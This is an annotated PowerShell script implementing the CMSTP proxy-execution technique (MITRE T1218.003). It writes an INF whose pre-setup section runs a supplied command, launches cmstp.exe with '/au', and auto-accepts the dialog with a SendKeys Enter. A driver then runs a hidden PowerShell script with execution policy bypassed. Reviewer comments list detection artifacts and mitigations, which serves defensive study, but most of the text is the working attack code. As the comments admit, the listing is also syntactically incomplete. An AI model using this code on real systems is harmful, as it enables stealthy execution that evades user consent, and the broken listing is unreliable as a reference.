# Run: builds an INF file whose [RunPreSetupCommandsSection] carries $CustomCommand,
# starts cmstp.exe with "/au <inf path>", brings the resulting window to the
# foreground and sends it an Enter keystroke.
#
# Parameters:
#   -CustomCommand  text interpolated verbatim into the INF pre-setup command section.
#   -InfFile        path of the INF file; when empty, a random name under the temp
#                   directory is generated.
# Output: the Boolean returned by SetForegroundWindow is not captured, so it is
#         emitted on the pipeline.
#
# NOTE(review): this is the pattern catalogued as MITRE ATT&CK T1218.003 (System
# Binary Proxy Execution: CMSTP); presumably it is used to run the command without
# a UAC consent prompt (T1548.002) - that cannot be confirmed from this listing alone.
# NOTE(review): the listing as captured is not syntactically complete (block and
# here-string terminators are missing), so which statements fall inside the
# `if (-not $InfFile)` branch cannot be determined from what is shown.
#
# Artifacts visible in this code that process/file telemetry can key on:
#   - a randomly named *.inf created in the temp directory;
#   - cmstp.exe started with "/au" and that INF path on its command line;
#   - "taskkill /IM cmstp.exe /F" listed after the custom command in the INF;
#   - the App Paths\CMMGR32.EXE registry location and the "CorpVPN" service name
#     referenced in the INF text.
# Application-control rules (AppLocker/WDAC) for cmstp.exe, and alerting on cmstp.exe
# loading an INF from a user-writable path, address the launch step shown here.
function Run {
param(
[string]$CustomCommand,
[string]$InfFile
# Fixed path of the Windows Connection Manager Profile Installer that is launched below
$BinaryPath = "C:\Windows\System32\cmstp.exe"
$TempDir = [System.IO.Path]::GetTempPath()
$RandomFileName = [System.IO.Path]::GetRandomFileName()
# No INF path supplied: fall back to <temp dir>\<random name>.inf
if (-not $InfFile) {
$InfFile = Join-Path -Path $TempDir -ChildPath "$RandomFileName.inf"
# INF text; $CustomCommand is expanded into it because the here-string is double-quoted,
# while the backtick-escaped `$chicago`$ stays a literal signature value
$InfContent = @"
[version]
Signature=`$chicago`$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
$CustomCommand
taskkill /IM cmstp.exe /F
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
""HKLM"", ""SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE"", ""ProfileInstallPath"", ""%UnexpectedError%"", """"
[Strings]
ServiceName=""CorpVPN""
ShortSvcName=""CorpVPN""
# Write the INF content to $InfFile; the encoding is set explicitly to ASCII
$InfContent | Out-File -FilePath $InfFile -Encoding ASCII
# The INF path is printed to the host, so it also appears in PowerShell transcripts if those are enabled
Write-Host "Payload inf written to $InfFile" -ForeGroundColor Green
# Start cmstp.exe directly (UseShellExecute = $false) with "/au <inf path>" as its arguments;
# the path is not quoted in the argument string
$processStartInfo = New-Object System.Diagnostics.ProcessStartInfo
$processStartInfo.FileName = $BinaryPath
$processStartInfo.Arguments = "/au $InfFile"
$processStartInfo.UseShellExecute = $false
$process = [System.Diagnostics.Process]::Start($processStartInfo)
# Compile a small P/Invoke wrapper around user32!SetForegroundWindow so the window can be activated
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class User32 {
[DllImport("user32.dll")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetForegroundWindow(IntPtr hWnd);
}
# Bring the started process's main window to the foreground (result is not checked)
[User32]::SetForegroundWindow($process.MainWindowHandle)
# Pause 280 ms before the keystroke; the author notes this is the lowest value that can be used
Start-Sleep -milliseconds 280
# Send Enter ("~" is the SendKeys code for ENTER) to the active window -
# presumably the cmstp dialog, so that it is accepted without user interaction
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.SendKeys]::SendWait("~")
########################### PS1 file #####################################
# Top-level driver: writes a randomly named .ps1 into the current user's Music folder,
# then passes a powershell.exe command line that runs it to Run (defined above).
# NOTE(review): the .ps1 only starts C:\Intel\cw.cmd, which is not created anywhere in
# this listing; the here-string terminator is also missing from the captured text.
# Telemetry hooks visible here: a *.ps1 file created under the Music folder, and a
# powershell.exe command line combining -noprofile, -WindowStyle hidden and
# -ExecutionPolicy Bypass with that script path.
$musicDirectory = [System.Environment]::GetFolderPath('MyMusic')
# Generate a random PS1 file name
$randomFileName = [System.IO.Path]::GetRandomFileName()
# GetRandomFileName returns a name containing a dot; strip it before appending ".ps1"
$randomFileName = $randomFileName -replace '\.',''
$ps1FileName = "$randomFileName.ps1"
######################### Define Payload #################################
# Define the content of the PS1 file
$ps1Content = @"
Start-Process C:\Intel\cw.cmd
# Construct the full path for the PS1 file
$ps1FilePath = Join-Path -Path $musicDirectory -ChildPath $ps1FileName
# Create the PS1 file and write the content (-Force overwrites an existing file)
$ps1Content | Set-Content -Path $ps1FilePath -Force
Write-Host "Random PS1 file created at: $ps1FilePath"
############## RUN ###############
$FinalPath = $ps1FilePath
# Command line handed to Run as -CustomCommand: powershell.exe with no profile,
# a hidden window and execution policy bypassed, followed by the script path
$Command = "powershell.exe -noprofile -WindowStyle hidden -ExecutionPolicy Bypass " + $FinalPath
Run -CustomCommand "$Command"